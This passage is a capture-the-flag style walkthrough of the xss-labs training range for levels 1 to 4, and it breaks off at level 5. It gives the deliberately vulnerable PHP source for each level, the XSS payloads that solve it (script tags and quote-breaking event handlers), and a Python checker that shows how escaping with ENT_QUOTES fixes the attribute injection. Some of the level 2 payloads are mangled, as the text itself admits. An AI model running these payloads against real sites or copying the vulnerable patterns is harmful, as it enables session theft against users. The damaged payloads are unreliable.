xss-labs: clearing every level
- Preface
- level 1
- level 2
- level 3
- level 4
- level 5
- level 6
- level 7
- level 8
- level 9
- level 10
- level 11
- level 12
- level 13
- level 14
- level 15
- level 16
- level 17
- level 18
- level 19
- level 20
Preface
The xss-labs target range used here lives at https://github.com/do0dl3/xss-labs. Setting it up is not covered again; it can be built locally with phpstudy. Firefox is recommended; open http://ip/xss-labs.
Click the image to start your XSS journey!
level 1
Source:

```php
<body>
<h1 align=center>欢迎来到level1</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "欢迎用户".$str."";
?>
<center><img src=level1.png></center>
<?php
echo "payload的长度:".strlen($str)."";
?>
</body>
```

Analysis: no filtering at all.
Payload: `name=<script>alert(/xss/)</script>`
level 2
Source:

```php
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "没有找到和".htmlspecialchars($str)."相关的结果. ".'<center>
<form action=level2.php method=GET>
<input name=keyword value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>
</center>';
?>
<center><img src=level2.png></center>
```

Analysis: there are two output points. The first is in the echo inside the PHP block, the second is in the form's input element. The first is escaped with htmlspecialchars(); the second has no restriction at all, so it is enough to make the payload take effect at the second point. There are two ways to do it.
1. Stay inside the input tag: close the double quote in front of the value and add an event handler to trigger the XSS:
Triggered by moving the mouse, payload: `" onmouseover="alert(/xss/)`
Triggered by clicking the input box, payload: `" onfocus="alert(/xss/)`
2. Break out of the input tag and trigger the XSS with another tag:
With an `<img>` tag, payload: `"><img src=! >`
With another tag, payload: `">:alert(/xss/)">` // the browser may filter this one
With an `<a>` tag, payload: `"><a >xss</a>`
With an `<a>` tag, payload: `<a >xss</a>` // move the mouse into the box
(The event and URL attributes of the payloads in this second group did not survive in the source text as extracted.)
level 3
Source:

```php
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "没有找到和".htmlspecialchars($str)."相关的结果. "."<center>
<form action=level3.php method=GET>
<input name=keyword value='".htmlspecialchars($str)."'>
<input type=submit name=submit value=搜索 />
</form>
</center>";
?>
<center><img src=level3.png></center>
```

Analysis: this time both output points are escaped with htmlspecialchars(), so double quotes and angle brackets no longer work. However, unless the function's flags are changed, the single quote is not escaped by default, and the source wraps value in single quotes, which looks like a deliberate hint to use single quotes.
Payload: `' onmouseover='alert(/xss/)` // other payloads omitted
level 4
Source:

```php
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "没有找到和".htmlspecialchars($str)."相关的结果. ".'<center>
<form action=level4.php method=GET>
<input name=keyword value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
```

Analysis: again there are two output points. One is escaped, the other has its angle brackets replaced with nothing. That does not get in the way: following the pattern of the previous two levels, we cannot close the tag, but we can still trigger XSS from inside the input tag.
Payload: `" onmouseover="alert(/xss/)` // triggered by clicking the input box with the mouse; other payloads omitted
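Levels 2, 3 and 4 share one lesson: what matters is the output context, here an HTML attribute, and each level's filter misses the character that closes that context (nothing at all in level 2, the single quote under htmlspecialchars() defaults in level 3, the quote again when only `<` and `>` are stripped in level 4). The following Python script is an added example, not code from the xss-labs project or from the original post. It re-implements PHP's htmlspecialchars() for the two flag settings that matter (the assumption is that ENT_COMPAT, which leaves the single quote alone, is the default in PHP before 8.1; from PHP 8.1 the default already includes ENT_QUOTES), renders the `<input ... value=...>` tag the way each level does, and parses the result back with Python's standard `html.parser` to check whether the untrusted value stayed inside the `value` attribute and survived unchanged. The payload strings are the ones quoted in the walkthrough; the check function and its name are this example's own.

```python
from html.parser import HTMLParser

# Sample inputs, taken from the walkthrough above (constructed test data).
PAYLOAD_DQ = '" onmouseover="alert(/xss/)'   # closes a double-quoted attribute
PAYLOAD_SQ = "' onmouseover='alert(/xss/)"   # closes a single-quoted attribute
PAYLOAD_TAG = "<script>alert(/xss/)</script>"


def php_htmlspecialchars(s: str, ent_quotes: bool = False) -> str:
    """Python model of PHP htmlspecialchars() (assumption: mirrors PHP's behaviour).
    ENT_COMPAT (the pre-8.1 default) encodes & < > and the double quote only;
    ENT_QUOTES additionally encodes the single quote."""
    out = (s.replace("&", "&amp;").replace("<", "&lt;")
            .replace(">", "&gt;").replace('"', "&quot;"))
    if ent_quotes:
        out = out.replace("'", "&#039;")
    return out


def strip_angle_brackets(s: str) -> str:
    """Level 4's filter: remove > and < and nothing else."""
    return s.replace(">", "").replace("<", "")


def identity(s: str) -> str:
    """Level 2's second output point: the value is echoed unchanged."""
    return s


class StartTags(HTMLParser):
    """Collects every start tag the browser-side parser would see, with its attributes."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, attrs))

    handle_startendtag = handle_starttag


def check_attribute_context(raw: str, encode, quote: str) -> dict:
    """Render <input name=keyword value=QUOTE...QUOTE> as the level does, parse it back,
    and report whether the untrusted value stayed inside 'value' (contained) and
    round-tripped without modification (faithful)."""
    html = f"<input name=keyword value={quote}{encode(raw)}{quote}>"
    parser = StartTags()
    parser.feed(html)
    parser.close()
    tags = parser.tags
    contained = (len(tags) == 1 and tags[0][0] == "input"
                 and [name for name, _ in tags[0][1]] == ["name", "value"])
    faithful = contained and dict(tags[0][1])["value"] == raw
    return {"html": html, "contained": contained, "faithful": faithful}


if __name__ == "__main__":
    cases = [
        ("level 2: raw echo, double quotes", PAYLOAD_DQ, identity, '"'),
        ("level 3: htmlspecialchars default, single quotes", PAYLOAD_SQ, php_htmlspecialchars, "'"),
        ("level 4: strip <>, double quotes", PAYLOAD_DQ, strip_angle_brackets, '"'),
        ("fix: htmlspecialchars ENT_QUOTES, single quotes", PAYLOAD_SQ,
         lambda s: php_htmlspecialchars(s, ent_quotes=True), "'"),
    ]
    for label, raw, encode, quote in cases:
        r = check_attribute_context(raw, encode, quote)
        print(f"{label}: contained={r['contained']} faithful={r['faithful']}  {r['html']}")
```

The three level configurations all come back with `contained=False`: the parser sees an extra `onmouseover` attribute, which is exactly what the browser acts on. Encoding with ENT_QUOTES (or any encoder that handles both quote characters and `&`, `<`, `>`) keeps the value contained and faithful regardless of which quote the template uses, whereas level 4's bracket stripping also fails the faithfulness test for ordinary input such as a search for `<b>`: it silently changes user data without closing the attribute-injection hole.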
level 5
Source:

```php
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("
```